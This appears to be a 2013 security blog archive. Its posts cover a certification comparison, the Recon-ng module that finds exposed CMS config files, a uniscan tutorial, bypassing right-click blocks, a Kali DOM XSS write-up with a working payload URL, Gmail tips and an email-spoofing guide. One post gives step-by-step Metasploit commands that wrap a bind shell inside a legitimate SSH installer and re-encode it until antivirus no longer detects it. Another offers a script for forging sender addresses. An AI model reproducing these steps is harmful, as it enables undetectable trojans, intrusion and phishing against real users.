Aryan Abrar: 2013

Monday, August 5, 2013

Why CPTE IS Better Than CEH?

In today’s information age, the security of data and technical assets from “Hackers” has become the top priority for every organization. For this purpose organizations hunt for people who can actually provide Information security to them. These guys (or girls in some cases) are generally referred to as “Security professionals”. We can imagine them as knights of the cyber space.

If we look a few decades back when cyber space just considered a myth, when most computers were noisy large mainframes and when the word “Hack” was just for train modelling (this was not a joke), back then there was no concept of cyber security. But after some nasty security breaches governments put their heads together upon this issue and Cyber security departments and organizations were formed to train such people.

Nowadays we see two certifications that are racing each other, one is CPTE (Certified Penetration testing engineer) from mile2 and the other is CEH (Certified Ethical Hacker) from EC-Council. But if we look at the fact I would say CPTE has lead in this one and this is not a hunch.
Some interesting facts that prove that CPTE is better than CEH

Facts

If we analyze the course outline and the material of both courses it is clearly seen that in CEH candidate are only taught how to use the tools required for the job and are not provided with knowledge otherwise.

While CPTE candidates are provided with in-depth knowledge so that they may be able counter security issues more efficiently.

CPTE has regular updates and modifications according to the fashion in security. While CEH is only updated entirely once in several years.

Now if we look at the other aspects CPTE also enhances the business skills needed to identify protection opportunities and optimize security controls according to the business needs while CEH we only focuses the technical side of Information security and that too up to the extent of teaching how to use tools.

Now let us look at the economic factors that make CPTE better than CEH. The exam cost of CPTE is 250$ with no expiration of the course it means that if a course more advanced then CPTE is produced in the future then CPTE will remain as It is and the certifications of the candidates will whatsoever not be cancelled, Now the cost of CEH is 500$ with the possibility that the course will expire in 2 years when it is updated with a newer version and CEHv7 (CEH currently in action) will have to be re-done otherwise certifications will be cancelled. Now that might not sound like a good news to most of us who were thinking of doing CEH (because it is not a good news).

Last but not the least the CPTE course has been accredited by NSA itself as a National Information Assurance Training standard for system administrators while CEH has no accreditation.

There you have it in-depth knowledge, more comprehensive training, accreditation by NSA what more could a person ask for in 250$. I know I am going for CPTE, wait….. I already am a CPTE. I don’t know about you guys.
Cheers

Recon-ng Framework A Quick Intro

Recon-ng is an open-source framework coded in python by Tim Tomes a.k.a LaNMaSteR53. Its interface is modeled after the look of the Metasploit Framework but it is not meant for exploitation or for spawning a meterpreter session or a shell, it is for web-based reconnaissance and information gathering. It comes with modules to support your web reconnaissance adventure and information gathering just like Metasploit's auxiliary and exploit modules. Modules are categorized into Discovery, Experimental, Recon and Reporting.
As of this writing here are the modules with its subcategories:

Discovery
---------
discovery/exploitable/http/dnn

_fcklinkgallery
discovery/exploitable/http/generic_restaurantmenu
discovery/exploitable/http/webwiz_rte
discovery/info_disclosure/dns/cache_snoop
discovery/info_disclosure/http/backup_finder
discovery/info_disclosure/http/google_ids
discovery/info_disclosure/http/interesting_files

Experimental
------------
experimental/rce

Recon
-----
recon/contacts/enum/http/web/dev_diver
recon/contacts/enum/http/web/namechk
recon/contacts/enum/http/web/pwnedlist
recon/contacts/enum/http/web/should_change_password
recon/contacts/gather/http/api/jigsaw/point_usage
recon/contacts/gather/http/api/jigsaw/purchase_contact
recon/contacts/gather/http/api/jigsaw/search_contacts
recon/contacts/gather/http/api/linkedin_auth
recon/contacts/gather/http/api/twitter
recon/contacts/gather/http/api/whois_pocs
recon/contacts/gather/http/web/jigsaw
recon/contacts/gather/http/web/pgp_search
recon/contacts/support/add_contact
recon/contacts/support/mangle
recon/creds/enum/http/api/leakdb
recon/creds/enum/http/api/noisette
recon/creds/gather/http/api/pwnedlist/account_creds
recon/creds/gather/http/api/pwnedlist/api_usage
recon/creds/gather/http/api/pwnedlist/domain_creds
recon/creds/gather/http/api/pwnedlist/domain_ispwned
recon/creds/gather/http/api/pwnedlist/leak_lookup
recon/creds/gather/http/api/pwnedlist/leaks_dump
recon/hosts/enum/dns/resolve
recon/hosts/enum/http/api/builtwith
recon/hosts/enum/http/api/punkspider
recon/hosts/enum/http/api/wascompanyhacked
recon/hosts/enum/http/api/whatweb
recon/hosts/enum/http/api/whois_lookup
recon/hosts/enum/http/web/age_analyzer
recon/hosts/enum/http/web/asafaweb
recon/hosts/enum/http/web/gender_analyzer
recon/hosts/enum/http/web/ipvoid
recon/hosts/enum/http/web/malwaredomain
recon/hosts/enum/http/web/mywot
recon/hosts/enum/http/web/netbios
recon/hosts/enum/http/web/netcraft_history
recon/hosts/enum/http/web/open_resolvers
recon/hosts/enum/http/web/urlvoid
recon/hosts/enum/http/web/web_archive
recon/hosts/enum/http/web/xssed
recon/hosts/gather/dns/brute_force
recon/hosts/gather/http/api/bing_ip
recon/hosts/gather/http/api/google_site
recon/hosts/gather/http/api/shodan_hostname
recon/hosts/gather/http/web/baidu_site
recon/hosts/gather/http/web/bing_site
recon/hosts/gather/http/web/census_2012
recon/hosts/gather/http/web/google_site
recon/hosts/gather/http/web/ip_neighbor
recon/hosts/gather/http/web/mcafee/mcafee_affil
recon/hosts/gather/http/web/mcafee/mcafee_dns
recon/hosts/gather/http/web/mcafee/mcafee_mail
recon/hosts/gather/http/web/netcraft
recon/hosts/gather/http/web/yahoo_site
recon/hosts/geo/http/api/hostip
recon/hosts/geo/http/api/ipinfodb
recon/hosts/geo/http/api/maxmind
recon/hosts/geo/http/api/uniapple
recon/hosts/geo/http/web/wigle
recon/hosts/support/add_host

Reporting
---------
reporting/csv_file
reporting/html_report
reporting/list

I am also one of the contributors for this framework and has contributed mostly to the Discovery modules.

In this article I'm going to emphasize the Backup File Finder module which I authored together with Tim Tomes (the main developer of Recon-ng). This module can be used for checking specific hosts for exposed backup files. The default configuration searches for wp-config.php files which contain WordPress database configuration information.

As a side note, this module is inspired by cmsploit.

Basic Usage:

load discovery/info_disclosure/http/backup_finder (use the module)

show options (shows the options that can be set for the module)

set source target.com (the host you want to crawl)

set uri config_file (configuration file you want to check, ex. wp-config.php)

Here is the screenshot of the Backup File Finder's actual crawling.

Now, here is what's inside in a typical configuration file:

define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'passwd');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

List of the various configuration files used by popular CMS' which can be set to the option uri:

wp-config.php >> WordPress
config.php >> phpBB, ExpressionEngine
configuration.php >> Joomla
LocalSettings.php >>MediaWiki
mt-config.cgi >> Movable Type
settings.php >> Drupal

About The Author

This article has been written by Jay Turla, he is a security researcher at Infosec, along with security research he also performs vulnerability research too.

Sunday, July 21, 2013

Follow the simple steps to find the vulnerability in any website !

Now make sure you have opened Backtrack operating system and now just open the terminal and write the bellow code in the terminal and hit okay!

cd /pentest/web/uniscan && ./uniscan.pl

Now you can see the bellow snapshot there are few options are given.

Now we have are going to use the bellow command and make sure you have the website link :)

./uniscan.pl -u http://www.website.com/ –bqdw

And your website’s URL should be end with the forward slash and now just hit enter and then the process will start :)

Now as you can see we got the IP address and the server of the website :) and wait we will get many more information :)

Directory Check: Directory check will check the directories of the website and it will list the directories of the website as shown in the bellow snapshot.

How to scan a website for bugs using backtrack

File check : Now as the name says it will check the files which are hosted in the website.

Now crawler is started it will grab all the email address and externals hosts and all the information

Emails :

External Host:

Web backdoors:

File upload forums :

Now let me tell you that using this tool we can scan the websites for many more vulnerability like sql-i, XSS, remote code execution and many more and you can make few bucks by participating in the bug bounty program :)

Check out: How i got 100$ from Google bugbounty program

Now you can see in the above snapshot the list of the bugs it will find :)
Check out: The list of the bug bounty program !

Now as shown in the above we the website is vulnerable to the blind sqli. :D Mission accomplished :) we have found the bug. if you have any question about this then make a comment :)

Now if you want to get the list of the sites hosted on the same server then simply add this command, just replace the ip address with the server’s ip address. and the list of the websites will be stored in the same directory with the name “sites.txt”

./uniscan.pl -i "ip:127.0.0.1"

and then if you want to scan the list of the website then simply run this command

./uniscan.pl -f sites.txt –bqwd

Now you have done ! :) I hope you have enjoyed this tutorial :)

Friday, June 7, 2013

How to Bypass Right Click Block on Any Website

You might remember an experience where you tried to right-click on a web page but got a pop-up message saying that the “right-click functionality has been disabled”. Sometimes you may be trying to copy an image or view the source of a web page but when the right-click is disabled, these things would seem impossible. Bank websites and other sites that require a secure transaction such as a payment gateway are the ones to impose this kind of limited functionality on their pages. In this post, I will show you the ways by which you can easily bypass right-click block feature on any website.

In order to block the right-click activity, most websites make use of JavaScript which is one of the popular scripting languages used to enhance functionality, improve user experience and provide rich interactive features. In addition to this, it can also be used to strengthen the website’s security by adding some of the simple security features such as disabling right-click, protecting images, hiding or masking parts of a web page and so on.

How JavaScript Works?

Before you proceed to the next part which tells you how to disable the JavaScript functionality and bypass any of the restrictions imposed by it, it would be worthwhile for you to take up a minute to understand how JavaScript works.

JavaScript is a client side scripting language (in most cases), which means when loaded it runs from your own web browser. Most modern browsers including IE, Firefox, Chrome and others support JavaScript so that they can interpret the code and carry out actions that are defined in the script. In other words, it is your browser which is acting upon the instruction of JavaScript to carry out the defined actions such as blocking the right-click activity. So, disabling the JavaScript support on your browser can be a simple solution to bypass all the restrictions imposed by the website.

How to Disable the JavaScript?

Here is a step-by-step procedure to disable JavaScript on different browsers:

For Internet Explorer:

If you are using IE, just follow the steps below:

From the menu bar, go to Tools -> Internet Options.
In the “Internet Options” window, switch to Security tab and click on the button Custom level…

From the Security Settings, look for the option Active scripting and select the Disable radio button as shown above and click on “OK”.
You may even select the Prompt radio button, so that each time a page is loaded, you will have the option to either enable or disable the scripting.

For Google Chrome:

If you are using Chrome, you can disable the JavaScript by following the steps below:

Click on the Chrome “menu” button (on the top right corner) and select Tools.
From the “Settings” page, click on Show advanced settings…
Now under Privacy, click on the button Content settings…

Under the JavaScript, select the radio button which says “Do not allow any site to run JavaScript” and click on “Done”.

For Mozilla Firefox:

Steps to disable JavaScript on Firefox:

From the menu bar, click on Tools -> Options.
From the Options window, switch to Content tab, uncheck the option which says “Enable JavaScript” and click on “OK”.

How to Bypass the Right Click Block?

In order to bypass the right-click block or any other restriction imposed by JavaScript, all you need to do is just disable it in the browser and refresh the same page, so that it now reloads without JavaScript functionality. You are now free to right-click on the page, view its source or even copy any of the images that you may want to. Don’t forget to re-enable the JavaScript once again when your job is over. Otherwise lack of JavaScript support may result in unusual rendering of web pages.

How To Bypass Antivirus Detection - Making An Executable FUD

So in this tutorial we will show you step by step on how to make a virus Fully Undetectable from all the antiviruses. Thought their are lots of approaches, however our team member Malik Rafay has managed to find a way to make an executable FUD using msfencode.

Requirements

A Backtrack machine , real or virtual. I used Backtrack 5 r3, but other versions of Backtrack are working OK too !!!

Attention !!!

We are using some harmless test files but don't infect people with any real viruses that's a Crime and we here at RHA are not responsible for

Purpose:

Antivirus protects machines from malware but not all of it .there are ways to pack malware to make it harder to detect. well use metasploit to render malware completely invisible to antivirus.

Creating a Listener:

This is a simple payload that gives the attacker remote control of a machine. It is not a virus ant won't spread, but it is detected by antivirus engines. In Backtrack in a Terminal windows execute these commands:

cd
msfpayload windows/shell_bind_tcp LPORT=2482 X > /root/listen.exe
ls -l listen.exe

You should see the listen.exe file as shown below:

Analyzing the Listener with VirusTotal

Go to https://www.virustotal.com/en/

Click the "Choose File" button. Navigate to /root and double-click the listen.exe"listen.exe" appears in the "Choose File" box, as shown below:

In the virustotal web page , Click the "scan it" button !!!

If you see a "File already analyzed" message, click the "View last analysis" button.

The analysis shows that many of the antivirus engines detected the file--33 out of 42, when I did it, as shown below. You may see different numbers, but many of the engines should detect it.

Encoding the Listener

this process will encode the listener, & insert it into an innocent SSH file.

In BackTrack, in a Terminal window, execute these commands:

wget ftp://ftp.ccsf.edu/pub/SSH/sshSecureShellClient-3.2.9.exemsfencode -i /root/listen.exe -t exe -x /root/sshSecureShellClient-3.2.9.exe -k -o /root/evil_ssh.exe -e x86/shikata_ga_nai -c 1ls -l evil*

You should see the evil-ssh.exe file as shown below :

Scan with virusTOTAL

Go to: https://www.virustotal.com/

If you see a "File already analyzed" message, click the "View last analysis" button.

The analysis shows that fewer of the antivirus engines detect the file now--21 out of 42, when I did it, as shown below. You may see different numbers.

Encode the Listener Again This process will encode the listener with several different encodings.

In BackTrack, in a Terminal window, execute these commands:

msfencode -i /root/listen.exe -t raw -o /root/listen2.exe -e x86/shikata_ga_nai -c 1msfencode -i /root/listen2.exe -t raw -o

/root/listen3.exe -e x86/jmp_call_additive -c 1 msfencode -i /root/listen3.exe -t raw -o /root/listen4.exe -e x86/call4_dword_xor -c 1

msfencode -i /root/listen4.exe -o /root/listen5.exe -e x86/shikata_ga_nai -c 1ls -l listen*

You should see several files as shown below :

Analyzing Again

The analysis shows that fewer of the antivirus engines detect the file now 0 out of 42 When I did it as shown below. you may see different numbers.

Tuesday, May 21, 2013

Kali Linux DOM Based XSS Writeup

Recently, I have been on a mission to find XSS in popular security training websites, Since these are the ones who care about their security the most. I have been successful in finding in almost all of them i have tried up to date, This one was a bit interesting to i thought to write a post on it, Basically it was not a reflected/stored xss, however it was a DOM based XSS, similar to the one i found in Microsoft. Unlike others, this particular XSS occurs in client side javascript.

In order to provide features to the users lots of webmasters/Vendors are moving their code towards client side, the data is embedded in the DOM and before it's reflected back to the user it is not filtered out, which results in a DOM based XSS. The main cause of this vulnerabilities are dangerous Sinks. DOM based XSS wiki is a good source where you would find dangerous sources and sinks.

On checking out the source of kali.org, i immediately found out that i was running wordpress version 3.5.1, The version is the latest version of the wordpress and has no known public vulnerabilities till date, therefore i moved towards testing plugins.

I tested couple of plugins, however did not find any one of them vulnerable, by analyzing the source more deeply i found a pretty interesting plugin "WP-Pretty Photo" which caught my interest. Which is a jquery based lightbox for wordpress platform.

While, searching for common vulnerabilities for wp-prettyphoto plugin i found that it was vulnerable to DOM Based XSS. So, i quickly added my payload to the url and bamn it triggered an XSS.

POC:

http://www.kali.org/#!%22%3E%3Cimg%20src=1%20onerror=prompt%280%29;%3E//

Some debugging with chrome JS console, led me to the line 79 of the jquery.prettyPhoto.js, the line of code which was responsible for the cause of the DOM Based XSS.

http://www.kali.org/wp-content/themes/persuasion/lib/scripts/prettyphoto/js/jquery.prettyPhoto.js?ver=2.1

It was also obvious from the code that it required us ! sign to successfully execute the javascript.

The input inside the hashrel was not filtered out before it was being displayed to the user, which resulted in the DOM Based XSS.

The Fix

The following url discusses, about the fix:

https://github.com/Duncaen/prettyphoto/commit/3ef0ddfefebbcc6bbe9245f9cea87e26838e9bbc

If, this was not enough for you, then listen to this, Offensive-security team was very awesome in a sense, that they gave me a free voucher for their famous certification PWB 3.0.

I was really surprised to see that Dominator was not detecting it which is the only good tool for finding DOM Based XSS leaving IBM javascript scan apart, in past i have tried dominator against various websites suffering from DOM Based XSS and have found that, at some spots it's very good and at some spots it needs much improvement. Here is the screenshot:

I would like that every one would be act the same way i did and responsibly disclose every issue you find.

Friday, May 17, 2013

In this post, I am going to show you how to use your Gmail account to send and receive emails from multiple addresses. Most of us own more than one email account say for example, one from Gmail, one from Yahoo and one from Hotmail. If you are tired of logging into multiple accounts to check your inbox or send emails, I have a solution here.

Gmail has an option to integrate multiple email accounts (email addresses) into a single Gmail account. Once you integrate multiple email addresses into your Gmail account, you can use the same account to send and receive emails for different email addresses you have. Let’s take a simple example.

Suppose you have three email addresses (email accounts):

john@gmail.com
john@yahoo.com
john@hotmail.com

You can integrate the emails john@yahoo.com and john@hotmail.com to john@gmail.com and operate all the three accounts from your single gmail account. Here is a step-by-step procedure to do this:

Login to your gmail account.
Click on Settings at the top right corner.
Under Settings, click on the Accounts tab.
Now you’ll see the first option “Send mail as:“
Under this option, click on Add another email address you own.
Now a small new window will pop-up asking you to enter the details of your new email address.
Here you can enter any name and any email address. The email address need not belong to gmail only. You can enter your yahoo, hotmail or any other valid email address.
A Verification email will be sent to the address that you specify. Once you verify that you own the email address, it will be integrated to your Gmail account.

Now, when you compose a new email, you’ll see an option to select from multiple address to send the mail. Also you’ll receive the incoming mails for multiple addresses to a single mailbox. I hope this will benefit you.

Before you leave, I should also tell you one good advantage of this. According to Gmail privacy policy, they will not send the user’s IP address in the outgoing emails. That means, when you send an email from your Gmail account , the receiver will not be able to find out your IP address. But you do not have this advantage in Yahoo or other email providers.

Please share your opinions through comments. I hope this helps….

How Was 133day.com Hacked?

Today, in the morning when i browsed to 1337day.com (The famous exploit buying/selling database), I was shocked to see 1337day defaced by famous turkish hacker group named "Turkguvenligi", In past Turkguvenligi has been responsible for defacements of lots of famous websites. Here is what appeared when i came across 1337day.com

On their defacement page, they told that they had asked 1337day to ban a fake user with author id =5819 but they refused to do so, As i browsed to http://www.1337day.com/author/5819, i website was first appeared to be inaccessible, later it showed the following message:

However, i used their mirror site 1337day.org to access the author link, Here is the screenshot:

By looking at the author name "Agd_Scorp", i understood the whole point of the dispute, Agd_Scorp is a well known hacker and founding member of "Turkguvenligi", He is responsible for lots of high profile defacements, If you take a look at his Zone-h record, it's pretty impressive, he has history of hacking into domain registrars.

It appears to me that some known was submitting exploits with the name of Agd_Scorp, They asked 1337day team to remove it, however they refused to remove it. Therefore they defaced their website.

How was 1337day.com hacked?

There have been issues in the past where 1337day, injectors etc and their mirror websites were hacked, but in all of those cases, their servers were never compromised, it was their domain registrar Moniker.com, which got compromised by the attackers.

The attackers, compromised moniker.com and changed their dns servers to their own dns servers, a story matching Google Pakistan hack, The 1337day team later confirmed on their facebook that their domain registrar was the victim of their attack not their DNS servers.

They have also asked webmasters not to invent stories that their server was hacked. They say it's impossible, I don't agree with them on this point. Even most secure systems can be compromised.

On performing a WHOIS lookup, I came to know that they have actually switched their hosting account from Moniker.com to hostgator.com

I have confirmed with hostgator that the dns servers for websitewelcome belong to them. We, will update you as soon as we have more information.

Thursday, May 16, 2013

How to Send Spoofed Emails Anonymously

Most of us are very curious to know a method to send spoofed emails to our friends and family for fun. But the question is, is it possible to send spoofed emails in spite of the advanced spam filtering technology adopted by email service provides like Gmail, Yahoo etc?

The answer is YES, it is still possible to bypass their spam filters and send spoofed emails anonymously to your friends or family members. For example, you can send an email to your friend with the following sender details.

From: Bill Gates <billg@microsoft.com>

The art of sending this kind of email is known as Email Spoofing. One of the easy way to send a spoofed email is by using our own local SMTP server. In the past, I have tried SMTP servers like QK SMTP server. This method used to work successfully in those days, but as of now, it has a very low success rate since Gmail and Yahoo (all major email service providers) blocks the emails that are sent directly from a home computer.

How to Send Spoofed Emails?

In this post, I have come up with a new method of sending spoofed emails to anyone without having to worry about being blocked or filtered as spam. In order to accomplish this, all you’ve to do is use a “relay server” while sending the spoofed emails.

What is a Relay Server?

In simple words, a relay server is an SMTP Server that is trusted by major companies as an authorized sender of the email. So, when you send an email using a relay server, the email service providers like Yahoo and Gmail blindly accept the emails and deliver it to the inbox of the recipient. If the SMTP server is not authorized, Google and Yahoo will reject all the emails sent from this SMTP server. This is the reason for which using our own SMTP server to send emails fail.

So, How to Find a Relay Server?

Now, all we have to do is find a trusted SMTP server so as to send spoofed emails successfully. Usually, all the emails that are sent from web hosting providers are trusted and authorized. So, you have to find a free web hosting provider that allows you to send emails. But, most of the free web hosts disable the Mail feature and do not allow the users to send emails. This is done just to avoid spamming. However, all the paid hosting plans allow you to send any number of emails. Once you find a hosting service that allows to send emails from their servers, it’s just a cakewalk to send anonymous emails. All we have to do is just modify the email header to insert a fake From: address field into it.

I have created a PHP script that allows you to send emails from any name and email address of your choice. Here is a step-by-step procedure to setup your own anonymous email sender script:

Go to X10 Hosting and register a new account.
Download my script from the following link:

Download Anonymous Email Sender Script
Login to your FreeWebHostingArea Account and click on File Manager.
Upload the sendmail.php, pngimg.php and bg1.PNG files to the server.
Set permissions for sendmail.php, pngimg.php and bg1.PNG to 777.
Now type the following URL:

http://yoursite.x10hosting.com/sendmail.php

NOTE: yoursite must be substituted by the name of the subdomain that you have chosen during the registration process.
Use the script to send spoofed emails anonymously to your friends and have fun. Enjoy!!!

Tell me whether it worked or not. Please pass your comments.

Use One Gmail Account to Send Emails from Multiple IDs

Suppose you have three email addresses (email accounts):

john@gmail.com
john@yahoo.com
john@hotmail.com

Login to your gmail account.
Click on Settings at the top right corner.
Under Settings, click on the Accounts tab.
Now you’ll see the first option “Send mail as:“
Under this option, click on Add another email address you own.
Now a small new window will pop-up asking you to enter the details of your new email address.
Here you can enter any name and any email address. The email address need not belong to gmail only. You can enter your yahoo, hotmail or any other valid email address.
A Verification email will be sent to the address that you specify. Once you verify that you own the email address, it will be integrated to your Gmail account.

Please share your opinions through comments. I hope this helps….

How to Block Unwanted Emails

Do you want to block unwanted emails from your ex wife/husband? Do you want to block those annoying offers and newsletters that reach your inbox? Well, here is a way to block all those unwanted and annoying emails that you do not want to see or read!

In this post, I will show you a trick using which you can block individual email address or the whole domain from which you do not want the emails to come from.

Steps to Block Unwanted Emails from Your Account:

Here is a list of separate set of steps that you need to follow for each individual service provider:

For Gmail:

Here is how you can block emails for Gmail:

Log in to your account.
At the top-right corner, click on Settings.
Under Settings, click on Filters.
You’ll now see an option “Create a new filter“, click on it.
Now in the From field, enter the email address from which you do not want to receive the emails.

For ex. you may enter john@gmail .com in the “From:” field to block all incoming emails from this address. However, if you want to block the whole domain, then use the following syntax: *@xyz.com. Now, all the incoming emails from the domain “xyz.com” will be blocked.
Click on Next Step, select the action you’d like to take on the blocked emails. You may select the option Delete it so that the blocked email is moved to trash. In case if you would like to unblock those emails, all you need to do is just delete the filter that you’ve created.

For Yahoo:

Here is how you can block unwanted emails for Yahoo:

Log in to your account.
At the top-right corner, click on Options.
A drop down menu appears, now click on More options.
In the left panel select the option Filters and click on create or edit filters.
Now click on Add.
In the next screen, give a name to your filter and in the From header field enter the email address that you want to block.

Fox ex. john@gmail.com or if you want to block an entire domain then just enter @xyz.com. Don’t enter *@xyz.com. Select the option Move the message to: Trash and click on Save Changes.

For Hotmail:

Here is how to do the same for Hotmail:

Log in to your account.
At the top-right corner, click on Options.
A drop down menu appears, now click on More options.
Click on Safe and blocked senders link under Junk e-mail.
Now click on Blocked senders.
Type in the email address that you want to block under blocked e-mail address or domain field.

For ex. Enter john@yahoo.com to block the individual email address or just enter xyz.com to block the entire domain.

That’s it. You no longer receive those annoying emails in your inbox. Keep your inbox clean and tidy. I hope this post helps. Pass your comments!